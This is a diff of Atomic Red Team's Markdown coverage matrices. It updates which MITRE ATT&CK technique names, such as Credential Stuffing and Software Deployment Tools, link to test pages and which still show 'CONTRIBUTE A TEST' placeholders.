| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | | | | | | | |
| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Systemd Service](../../T1543.002/T1543.002.md) | | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Systemd Timers](../../T1053.006/T1053.006.md) | | Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+2 -2
@@ -4,7 +4,7 @@
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -39,7 +39,7 @@
| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [Trap](../../T1546.005/T1546.005.md) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
| | | | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+8 -8
@@ -6,11 +6,11 @@
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Administration Command](../../T1609/T1609.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [External Remote Services](../../T1133/T1133.md) | [Cron](../../T1053.003/T1053.003.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RDP Hijacking](../../T1563.002/T1563.002.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | [Domain Account](../../T1087.002/T1087.002.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [Local Accounts](../../T1078.003/T1078.003.md) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -18,9 +18,9 @@
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DCSync](../../T1003.006/T1003.006.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchd](../../T1053.004/T1053.004.md) | [Browser Extensions](../../T1176/T1176.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | [Software Deployment Tools](../../T1072/T1072.md) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
| | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cloud Account](../../T1136.003/T1136.003.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
| | [Native API](../../T1106/T1106.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [PowerShell](../../T1059.001/T1059.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Remote Management](../../T1021.006/T1021.006.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
@@ -30,7 +30,7 @@
| | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | [Service Execution](../../T1569.002/T1569.002.md) | [Cron](../../T1053.003/T1053.003.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Software Discovery](../../T1518/T1518.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | |
